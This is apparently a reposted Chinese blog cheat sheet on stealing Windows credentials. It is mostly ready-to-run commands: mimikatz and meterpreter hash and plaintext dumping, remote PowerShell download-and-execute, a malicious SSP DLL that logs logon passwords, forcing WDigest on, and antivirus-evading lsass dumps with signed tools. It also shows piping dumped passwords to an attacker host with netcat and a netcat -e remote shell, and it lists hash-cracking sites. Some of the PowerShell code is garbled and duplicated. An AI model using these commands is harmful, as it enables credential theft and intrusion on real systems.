常见凭证获取方法

2023-10-27

常见凭证获取方法

Windows下凭证获取

系统密文数据

原理介绍

SAM系统安全账号管理,是微软设计的一个安全机制,为了保护账号以及密码的安全性。路径是C:/windows/system32/config/SA,该文件是无法修改和删除的,它一直和系统内存交互。里面的用户密码都是加密处理,加密算法有两类:LM hash和NT hash,前者已经废除,不再使用,现在系统(>=window 7&&>=window server 2008)中主要使用的是NT hash。

工具使用

接下来讲解常见的window系统hash获取的方法和工具。

(1)QuarksPwDump -dhl

(2)wce /wce -l

(3)pwdump7

(4)meterpreter

hashdump(system权限)

run post/windows/gather/smart_hashdump(administrator权限)

run post/windows/gather/hashdump(system权限)

load mimikatz 命令加载mimikatz

msv 获取hash

kerberos 获取明文

ssp 获取明文信息

tspkg 尝试检索tspkg凭据

wdigest 尝试检索wdigest凭据

mimikatz_command -f samdump::hashes 获取hash

mimikatz_command -f sekurlsa::searchPasswords 获取明文密码

使用meterpreter中扩展模块kiwi获取系统hash

load kiwi 当前的meterpreter中加载mimikatz。版本是2.2,在加载是会看到版本或者执行命令:kiwi_cmd version

creds_all

creds_msv

kiwi_cmd "privilege::debug" 开启debug权限

kiwi_cmd "sekurlsa::msv" 获取系统hash

  1. 使用mimikatz获取系统hash

方法1:离线方式

SAM导出hive,导入mimikatz,可以获取hash

reg save HKLM\SYSTEM sys.hiv

reg save HKLM\SAM sam.hiv

 mimikatz.exe "lsadump::sam /system:sys.hiv /sam:sam.hiv" exit

方法2:在线方式

mimikatz.exe “privilege::debug” “lsadump::lsa /inject”

  1. powershell 脚本

Get-PassHashes.ps1

 

如果该脚本要在目标服务器中执行,则需要先上传到目标主机中,在提权只有的终端执行powershell脚本,下图所示在meterprreter中执行。

 

 

或者远程加载使用

powershell iex (New-Object Net.WebClient).DownloadString('http://XXXXX/nishang/Gather/Get-PassHashes.ps1');Get-PassHashes

  1. LaZagne工具

LaZagne是一款用于检索大量存储在本地计算机密码的开源应用程序。该工具不仅能抓取windows密码,还可以抓取浏览器中的缓存的密码、SVN密码、wifi密码、邮箱密码等功能,适用于windows、Linux、MAC。下载地址 GitHub - AlessandroZ/LaZagne: Credentials recovery project

LaZagne.exe all

 

密文破解

本地破解

(1)Ophcrack

(2)Cain

  1. Hashcat

  2. SAMinside

在线破解hash网站

https://www.objectif-securite.ch/en/ophcrack

http://cracker.offensive-security.com/index.php

下面罗列了一些在线的破解网站:

国内Md5解密<br> 国外Md5解密<br>
[md5解密,md5加密,md5加密解密,md5在线解密,md5免费破解,md5密码破解,md5免费查询,免费MD5密码查询,免费破解](md5解密,md5加密,md5加密解密,md5在线解密,md5免费破解,md5密码破解,md5免费查询,免费MD5密码查询,免费破解" \t "/private/var/folders/wl/ckb_44_x15q4dr6tvw29yy1r0000gn/T/com.kingsoft.wpsoffice.mac/wps-huqianwei/x/_blank)<br>[md5在线解密_md5解密加密 - 查md5啦[cmd5.la]](md5在线解密_md5解密加密 - 查md5啦[cmd5.la]" \t "/private/var/folders/wl/ckb_44_x15q4dr6tvw29yy1r0000gn/T/com.kingsoft.wpsoffice.mac/wps-huqianwei/x/_blank)<br>[md5在线解密破解,md5解密加密](md5在线解密破解,md5解密加密" \t "/private/var/folders/wl/ckb_44_x15q4dr6tvw29yy1r0000gn/T/com.kingsoft.wpsoffice.mac/wps-huqianwei/x/_blank)<br>[md5解密 MD5在线解密 破解md5](md5解密 MD5在线解密 破解md5" \t "/private/var/folders/wl/ckb_44_x15q4dr6tvw29yy1r0000gn/T/com.kingsoft.wpsoffice.mac/wps-huqianwei/x/_blank)<br>[md5解密|md5在线解密 - 全球唯一8位小写+数字全收录的解密网站](md5解密|md5在线解密 - 全球唯一8位小写+数字全收录的解密网站" \t "/private/var/folders/wl/ckb_44_x15q4dr6tvw29yy1r0000gn/T/com.kingsoft.wpsoffice.mac/wps-huqianwei/x/_blank)<br>[https://md5.navisec.it/](https://md5.navisec.it/" \t "/private/var/folders/wl/ckb_44_x15q4dr6tvw29yy1r0000gn/T/com.kingsoft.wpsoffice.mac/wps-huqianwei/x/_blank)<br>[http://md5.tellyou.top/](http://md5.tellyou.top/" \t "/private/var/folders/wl/ckb_44_x15q4dr6tvw29yy1r0000gn/T/com.kingsoft.wpsoffice.mac/wps-huqianwei/x/_blank)<br>[MD5免费在线解密破解_MD5在线加密-SOMD5](MD5免费在线解密破解_MD5在线加密-SOMD5" \t "/private/var/folders/wl/ckb_44_x15q4dr6tvw29yy1r0000gn/T/com.kingsoft.wpsoffice.mac/wps-huqianwei/x/_blank)<br>[MD5在线解密|md5在线破解|批量破解md5网站 - ChaMd5.Org](MD5在线解密|md5在线破解|批量破解md5网站 - ChaMd5.Org" \t "/private/var/folders/wl/ckb_44_x15q4dr6tvw29yy1r0000gn/T/com.kingsoft.wpsoffice.mac/wps-huqianwei/x/_blank)<br> [MD5TR - Md5 Oluştur, Youtube Video İndir, mp3 İndir](MD5TR - Md5 Oluştur, Youtube Video İndir, mp3 İndir" \t "/private/var/folders/wl/ckb_44_x15q4dr6tvw29yy1r0000gn/T/com.kingsoft.wpsoffice.mac/wps-huqianwei/x/_blank)<br>[Biggest online MD5 database of Internet, size 4700 million unique hashes](Biggest online MD5 database of Internet, size 4700 million unique hashes" \t "/private/var/folders/wl/ckb_44_x15q4dr6tvw29yy1r0000gn/T/com.kingsoft.wpsoffice.mac/wps-huqianwei/x/_blank)<br>[MD5 conversion and MD5 reverse lookup](MD5 conversion and MD5 reverse lookup" \t "/private/var/folders/wl/ckb_44_x15q4dr6tvw29yy1r0000gn/T/com.kingsoft.wpsoffice.mac/wps-huqianwei/x/_blank)<br>[https://www.md5decrypt.org/](https://www.md5decrypt.org/" \t "/private/var/folders/wl/ckb_44_x15q4dr6tvw29yy1r0000gn/T/com.kingsoft.wpsoffice.mac/wps-huqianwei/x/_blank)<br>[Md5 Online Decrypt & Encrypt - More than 15.000.000.000 hashes](Md5 Online Decrypt & Encrypt - More than 15.000.000.000 hashes" \t "/private/var/folders/wl/ckb_44_x15q4dr6tvw29yy1r0000gn/T/com.kingsoft.wpsoffice.mac/wps-huqianwei/x/_blank)<br>[Ultimate Hashing and Anonymity toolkit](Ultimate Hashing and Anonymity toolkit" \t "/private/var/folders/wl/ckb_44_x15q4dr6tvw29yy1r0000gn/T/com.kingsoft.wpsoffice.mac/wps-huqianwei/x/_blank)<br>[Decrypt MD5, SHA1, MySQL, NTLM, SHA256, SHA512, Wordpress, Bcrypt hashes for free online](Decrypt MD5, SHA1, MySQL, NTLM, SHA256, SHA512, Wordpress, Bcrypt hashes for free online" \t "/private/var/folders/wl/ckb_44_x15q4dr6tvw29yy1r0000gn/T/com.kingsoft.wpsoffice.mac/wps-huqianwei/x/_blank)<br>[Hash Lookup / WhatsMyIP.org](Hash Lookup / WhatsMyIP.org" \t "/private/var/folders/wl/ckb_44_x15q4dr6tvw29yy1r0000gn/T/com.kingsoft.wpsoffice.mac/wps-huqianwei/x/_blank)<br>[MD5 Online | Free MD5 Decryption, MD5 Hash Decoder](MD5 Online | Free MD5 Decryption, MD5 Hash Decoder" \t "/private/var/folders/wl/ckb_44_x15q4dr6tvw29yy1r0000gn/T/com.kingsoft.wpsoffice.mac/wps-huqianwei/x/_blank)<br>[MD5 Passwörter entschlüsseln ッ](MD5 Passwörter entschlüsseln ッ" \t "/private/var/folders/wl/ckb_44_x15q4dr6tvw29yy1r0000gn/T/com.kingsoft.wpsoffice.mac/wps-huqianwei/x/_blank)<br>
MySQL破解:[https://www.mysql-password.com/hash](https://www.mysql-password.com/hash" \t "/private/var/folders/wl/ckb_44_x15q4dr6tvw29yy1r0000gn/T/com.kingsoft.wpsoffice.mac/wps-huqianwei/x/_blank)<br>

Hash使用

如果密码确实很复杂,线下和线上的破译方法均无解,则可以考虑使用PTH(pass the hash,hash传递)。具体内容见后续讲解。

系统明文密码

低版本(xp/win7/win8/8.1/2003/2008/2008r2/2012)或者没打补丁的系统获取明文时候,有如下的方式。

MSF

	getsystem

load mimikatz #help mimikatz 查看帮助

wdigest #获取Wdigest密码

mimikatz_command -f samdump::hashes #执行mimikatz原始命令

mimikatz_command -f sekurlsa::searchPasswords

	load kiwi

GetPassword_x64.exe

Wce

Wce -w

Mimikatz

(1)基本用法

cls-----------------------------清屏

exit----------------------------退出

version------------查看mimikatz的版本

system::user-----查看当前登录的系统用户

system::computer-------查看计算机名称

process::list------------------列出进程

process::suspend 进程名称 -----暂停进程

process::stop 进程名称---------结束进程

process::modules --列出系统的核心模块及所在位置

service::list---------------列出系统的服务

service::remove-----------移除系统的服务

service::start stop 服务名称--启动或停止服务

privilege::list---------------列出权限列表

privilege::enable--------激活一个或多个权限

privilege::debug-----------------提升权限

nogpo::cmd------------打开系统的cmd.exe

nogpo::regedit -----------打开系统的注册表

nogpo::taskmgr-------------打开任务管理器

ts::sessions-----------------显示当前的会话

ts::processes------显示进程和对应的pid情况等

sekurlsa::wdigest-----获取本地用户信息及密码

sekurlsa::tspkg------获取tspkg用户信息及密码

sekurlsa::logonPasswords--获登陆用户信息及密码

下面是mimiakatz2.2版本的使用方法:

(2)高级用法

mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir 记录输出

mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt 导出到指定的文件

输出到远程主机:

攻击机监听:nc –lvvp 9999

 

肉鸡:mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit | nc.exe -vv 192.168.2.101 9999

攻击机执行:nc –lvvp 2222

肉鸡监听: nc.exe -vv 192.168.2.96 2222 -e  mimikatz.exe

		  privilege::debug

		  sekurlsa::logonpasswords

SSP记录明文密码

安全支持提供程序(SSP)是一个DLL文件,用于扩展Windows身份验证机制。LSASS进程在启动时会加载安全支持提供程序SSP。如果替换某个SSP为恶意SSP,或者将SSP文件上传,修改LSA注册表使之启动时加载,然后我们就可以利用恶意DLL将输入LSASS程序的明文密码保存下来,实现抓明文密码。

此方法适用于win8/win2012后无法获取明文密码,或者维持域控、在域控上抓用户密码,注意前提是有管理员权限

方法1:SSP文件落地

Mimilib.dll是Windbg的插件,它是mimikatz的子工程,可以使用该文件导出一些函数,辅助渗透。下面介绍几个常用的方法。

记录明文口令:SpLsaModeInitialize

将mimilib.dll保存至c:\windows\System32,修改注册表位置:HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\。注册表项Security Packages的值添加一个mimilib

 

重新启动系统。进程lsass.exe将会加载mimilib.dll,同时在c:\windows\System32生成文件kiwissp.log,记录当前用户的明文口令,测试结果如图:

 

方法2:SSP文件不落地

mimikatz支持向lsass注入ssp,此技术不需要将mimilib.dll放入磁盘或创建注册表项,不需要重启既可以获取账户信息。缺点就是重新启动后失效

privilege::debug

misc::memssp

 

注意:修改完之后锁屏:rundll32 user32.dll LockWorkStatio 

等用户输入密码登录后,将在System32中创建一个日志文件记录明文密码:C:\Windows\System32\mimilsa.log

 

方法3:记录修改的密码

mimilib.dll里面的函数很多,功能很强,还有一个功能就是记录你修改的密码,将mimilib.dll移动到System32路径下。修改hklm\System\CurrentControlSet\Control\Lsa注册表Notification Packages项的值,在其中添加一个mimilib。

reg add "hklm\System\CurrentControlSet\Control\Lsa" /v "Notification Packages" /t REG_MULTI_SZ /d "scecli\0rassfm\:0mimilib" /f

 

重新启动系统,当系统发生修改密码的事件时,将生成一个日志文件记录用户新修改的明文密码:C:\Windows\System32\kiwifilter.log

 

Getpass.exe

powershell脚本

使用Invoke-Mimikatz.ps1、Out-Minidump.ps1等脚本获取目标主机的明文密码,下面使用远程加载脚本的方式执行。

Out-Minidump.ps1脚本可以现导出系统缓存文件dumps,最后使用mimikatz.ex在dumps文件中获取明文密码

mimikatz.exe "sekurlsa::minidump lsass_528.dmp" "sekurlsa::logonPasswords full" exit

CS获取系统hash以及明文密码

Dump Hashes #获取hash

Run Mimikatz #运行 Mimikatz

在获取某个主机的beacon中可以执行如下命令来获取hash和密码

hashdump 获取hash值

logonpasswords 相当于mimikatz_command -f sekurlsa::searchPasswords

高版本系统密码获取

在 KB2871997 之前, Mimikatz 可以直接抓取明文密码。当服务器安装 KB2871997 补丁后,系统默认禁用 Wdigest Auth ,内存(lsass进程)不再保存明文口令。Mimikatz 将读不到密码明文。但由于一些系统服务需要用到 Wdigest Auth,所以该选项是可以手动开启的。(开启后,需要用户重新登录才能生效)。从 Windows 8.1 和 Windows Server 2012 R2 开始,LM 哈希和“纯文本”密码将不在内存中生成。

Windows 7/8/2008 R2/2012 需要打 kb2871997 补丁,同时为了防止在 LSASS 进程中放置“明文”密码,下面的注册表键需要被设置为“0”(禁用摘要)。

攻击的思路是,将其设置为1,强制将“明文”密码放置在 LSASS 进程中。接下来的测试步骤有:修改注册表、锁屏(关机,但不推荐)、等待管理员登录

修改注册表:
cmd<br> reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f<br>
powershell<br> Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 1<br>
meterpreter<br> reg setval -k HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -v UseLogonCredential -t REG_DWORD -d 1<br>
锁屏:
cmd<br> rundll32 user32.dll,LockWorkStation<br>
powershell<br> powershell -c "IEX (New-Object Net.WebClient).DownloadString('https://x.x.x.x/Lock-WorkStation.ps1');"<br>

Lock-WorkStation.ps1代码如下:

|Function Lock-WorkStation <br>{<br>signature=@"<br>[DllImport("user32.dll",SetLastError=true)]<br>publicstaticexternboolLockWorkStation();<br>"@<br>signature = @"<br>[DllImport("user32.dll", SetLastError = true)]<br>public static extern bool LockWorkStation();<br>"@<br>signature=@"<br>[DllImport("user32.dll",SetLastError=true)]<br>publicstaticexternboolLockWorkStation();<br>"@<br>LockWorkStation = Add-Type -memberDefinition signature−name"Win32LockWorkStation"−namespaceWin32Functions−passthru<br>signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru<br>signature−name"Win32LockWorkStation"−namespaceWin32Functions−passthru<br>LockWorkStation::LockWorkStation() | Out-Null<br>}<br>Lock-WorkStation<br>| |-|

离线获取明文密码(绕过AV)

**SqlDumper + mimikatz **(高版本的操作系统用如下的方法是否导出密码?)

|查看lsass.exe 的ProcessID:tasklist /svc |findstr lsass.exe<br>导出dump文件:Sqldumper.exe ProcessID(进程ID) 0 0x01100<br>mimikatz加载dump文件:<br>mimikatz.exe "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" "exit"<br>| |-|

Procdump + mimikatz

SharpDump+ mimikatz

Avast+ mimikatz

通过Avast杀软自带AvDump.exe进行内存转储,因为带有杀软自身签名,所以一般不会被检测和查杀

tasklist /svc |findstr lsass 查看lsass的PID

.\avdump.exe --pid 640 --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file C:\ \lsass.dmp

注意:默认情况下,在管理员权限下的,打开cmd终端直接运行上面的代码获取的lsass.dmp文件是空的,因为没有cmd下管理员权限的用户没有开启sedebug权限。该权限的主要作用是:调试和调整属于其它账号的进程内存,它允许用户绑定一个调试器到任何进程,它提供访问敏感和关键的操作系统组件,用户模式下的应用程序声称为 "调试程序"

解决方法:pstools/impacket

  1. psexec提权至system:PsExec.exe -i -s cmd(i表示交互式,s表示system)
  2. 使用powershell:

mimikaez.exe "sekurlsa::minidump lass.dmp" "sekurlsa::logonpasswords full" exit

参考链接

Dumping Memory with AV - Avast Home Security · Arch Cloud Labs

https://github.com/rapid7/metasploit-framework/pull/14298

凭据转储:GitHub - Ignitetechnologies/Credential-Dumping: This cheatsheet is aimed at the Red Teamers to help them understand the fundamentals of Credential Dumping (Sub Technique of Credential Access) with examples. There are multiple ways to perform the same tasks

Credential Dumping: Wireless

Credential Dumping: Group Policy Preferences (GPP)

Credential Dumping: Windows Credential Manager

Credential Dumping: WDigest

Credential Dumping: Security Support Provider (SSP)

Credential Dumping: SAM

Credential Dumping: Applications

Credential Dumping: NTDS.dit

Credential Dumping: Phishing Windows Credentials

Credential Dumping: Local Security Authority (LSA|LSASS.EXE)

Credential Dumping: Clipboard

Credential Dumping: DCSync Attack

Credential Dumping: LAPS

Credential Dumping: Domain Cache Credential

Credential Dumping: Fake Services

Credential Dumping: Windows Autologon Password

无需修改注册表抓取明文密码

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

常见凭证获取方法 的相关文章

  • 21.QT-QTreeWidget,QTabWidget

    QTreeWidget树形列表 设置标签相关函数 void QTreeWidget setHeaderItem QTreeWidgetItem item void QTreeWidget setHeaderLabel constQStrin
  • 论文笔记:NeRF: Representing Scenes as Neural Radiance Fields for View Synthesis

    目录 文章摘要 1 Neural Radiance Field Scene Representation 基于神经辐射场的场景表示 2 Volume Rendering with Radiance Fields 基于辐射场的体素渲染 2 1
  • 奇异值分解 (SVD)原理及python实现

    奇异值分解 Singular Value Decomposition SVD 是一种矩阵分解 Matrix Decomposition 的方法 除此之外 矩阵分解还有很多方法 例如特征分解 Eigendecomposition LU分解 L
  • Linux Kernel编译流程 (二)

    1 vmlinux 研究vmlinux文件的产生 zImage和Image产生 Linux Kernel 4 18 20 Source Insight 3 5 Ubuntu 18 04 arm linux gnueabi xxx 1 1 f
  • 油盐微服务——服务容错保护Hystrix

    文章目录 引入Hystrix 由于网络问题或者依赖服务自身的问题出现的调用故障或者延迟 如果此时调用方请求不断增加 就会形成任务积压 最终导致自身服务的瘫痪 比如在一个电商网站中 可能会讲系统拆分成为用户 订单 库存 积分 评论等一系列服务
  • svn 撤销已经add的文件

    在svn add了某文件之后 发现某个文件不需要被修改 这时候可以使用revert命令来撤销add操作 svn revert 文件路径 如果需要将之前add的内容都撤销掉的话 一个文件或者一个文件夹来revert就会有点慢 这时候直接使用r
  • 小程序官方tabbar和自定义tabbar

    uniapp官方tabbar 打开项目中的 pages json 文件 在 JSON 对象中添加一个名为 tabBar 的字段 并设置其值为一个对象 在 tabBar 对象中 配置 color 和 selectedColor 字段来定义 T
  • moveToThread的经历

    moveToThread的前后QOBJECT的对象所依赖的线程会发生变化 即对象更该到设置的线程中去 如果对象里有QOBJECT成员 且没有父子关系 则这些成员仍然依赖于创建它的线程

随机推荐

  • python读取键盘输入模块-python 模拟键盘输入

    一 PyUserInput安装 python3 5的PyMouse和PyKeyboard模块都集成到了PyUserInput模块中 在python3 5中 直接安装PyUserInput模块即可 PyUserInput模块安装前需要安装py
  • 2023年第七届航空航天、机械与机电工程国际会议(CAMME 2023)会议日期:2023-2-18 至 2023-2-20

    会议简介 2023年第七届航空航天 机械与机电工程国际会议 CAMME 2023 重要信息 会议网址 www camme org 会议时间 2023年2月18 20日 召开地点 中国广州 截稿时间 2023年12月30日 录用通知 投稿后2
  • LCD显示的一些基本概念

    参考文章 LCD的一些基本概念 添加链接描述 知识点 水平消隐 Hblank 电子枪从左到右画出像素 他每次只能画一条扫描线 画之前要先回到左边并做好画下一条扫面线的准备 这之间有一段时间叫做水平消隐 垂直消隐 VBlank 在画完全部的的
  • 【Java面试题汇总】JVM篇(2023版)

    导航 黑马Java笔记 踩坑汇总 JavaSE JavaWeb SSM SpringBoot 瑞吉外卖 SpringCloud 黑马旅游 谷粒商城 学成在线 牛客面试题 目录 1 说说你了解的JVM内存模型 2 简单说下你对JVM的了解 3
  • 配置Spring数据源c3p0与dbcp

    不管通过何种持久化技术 都必须通过数据连接访问数据库 在Spring中 数据连接是通过数据源获得的 在以往的应用中 数据源一般是Web应用服务器提供的 在Spring中 你不但可以通过JNDI获取应用服务器的数据源 也可以直接在Spring
  • redis HyperLogLog

    1 概述 Redis 在 2 8 9 版本添加了 HyperLogLog 结构 Redis HyperLogLog 是用来做基数统计的算法 HyperLogLog 的优点是 在输入元素的数量或者体积非常非常大时 计算基数所需的空间总是固定
  • SpringBoot默认的五个静态资源位置&&自定义静态资源位置&&WebMvcCofigurer源码解析

    我们在SSM中的SpringMVC中配置静态资源过滤
  • Contest2609 - 高级语言程序实践--第8次作业--计信A2107-2113

    问题 A 统计字母数量 题目描述 有如下一段英文短文 请编写程序统计这段短文前 n 小段中每一个英文字母出现的次数 结果按次数降序排列 次数相同时 按字母表顺序输出 若 n 值大于短文行数 输出整篇文章中每一个英文字母出现的次数 大写字母按
  • Winsock属性、方法介绍

    Winsock是Mcrosoft windows提供的网络编程接口 它供了基于TCP IP协议接口实现方法 通过网络进行的数据通信 需要用地址来表示网络中的主机 TCP IP协议使用IP地址来作为主机的标识 实现的连接方式是通过IP地址来识
  • 亚信科技Java实习生(大三)面试

    亚信科技Java实习生面试 我面的挺晚的了 6 11才面 有的同学都实习几周甚至一个月了 但是同一个公司 我同学面试的时候 竟然全问的非技术问题 理想 大学经历 迷惑 可能我运气有一点好吧 看了一些面经 都是偏重基础 所以也是主要复习的基础
  • 2023华为od机试 Java 【路径步数】

    题目 小明喜欢户外运动 这个周末他打算去附近的山区探险 他面前有一张特殊的地图来帮助他找到这片区域的最高点 这张地图是一个由数字构成的网格 网格中的每一个单元格包含一个数字 代表那个点的高度 其中 数字 0 代表平地 而数字 1 到 9 则
  • 云服务器磁盘扩容后不显示,腾讯云服务器磁盘扩容问题小记

    操作系统 CentOS 7 2 文件类型 ext3 磁盘扩容前 一定要先做磁盘快照备份 1 卸载挂载点报错 umount dev vdb1 umount u01 target is busy In some cases useful inf
  • dclode mui.ajax无法发送跨域请求,type为abort

    前台 mui的ajax代码 后台java spring boot代码 后来得知原因是不能使用localhost和127 0 0 7需要使用本机的IP地址 且手机和电脑要连同一无线 修改ip地址后 程序正常 且需要注意 json要为大写 Js
  • 一道有关路由器的实验题 寻找前辈指导

    如图所示 使用Dynamips搭建网络环境由路由器R1 R5构成 路由器PC模拟PC机 R1 R2上配置Loopback地址 好像我的这个拓扑图无法显示 不过我把拓扑图传到附件那里了 如果有乐于助人的好前辈的话 那还的麻烦您把它下载来看看
  • ArrayList、ArrayDeque与LinkedList区别

    ArrayList ArrayDeque与LinkedList区别 ArrayList ArrayDeque内部以数组的形式保存集合中的元素 因此随机访问元素时有较好的性能 而LinkedList内部以链表的形式来保存集合中的元素 因此随机
  • 平均值不等式的证明

    平均值不等式的证明 需要证明的结论 对任意 n n n个正数 a 1
  • 【华为OD机试真题 JS】停车场车辆统计

    标题 停车场cars 数组表示 其中值1为有车 0为无车 车有三种大小 小车占位1 卡车占位2 货车占位3 求最少可以停多少车 输入描述 输入 整型字符串数组cars 其中1表示有车 0表示没车 数组长度小于1000 输出 整型数字字符串
  • 泛微为什么大量招人_OA市场增长乏力 泛微未来靠什么取胜?

    上周 泛微网络发布了其2019年中期财报 营收和利润均获得增长 财报显示 2019 年上半年 公司共实现营业收入 50 494 62 万元 同比增长 25 96 实现归母净利润 4 919 37 万元 比上年同期增加 35 70 尽管收入增
  • Go(五)数组

    目录 Array 数组 数组定义 数组的初始化 方法一 方法二 方法三 数组的遍历 多维数组 二维数组的定义 二维数组的遍历 数组是值类型 Array 数组 数组是同一种数据类型元素的集合 在Go语言中 数组从声明时就确定 使用时可以修改数
  • 常见凭证获取方法

    常见凭证获取方法 Windows下凭证获取 系统密文数据 原理介绍 SAM系统安全账号管理 是微软设计的一个安全机制 为了保护账号以及密码的安全性 路径是C windows system32 config SA 该文件是无法修改和删除的 它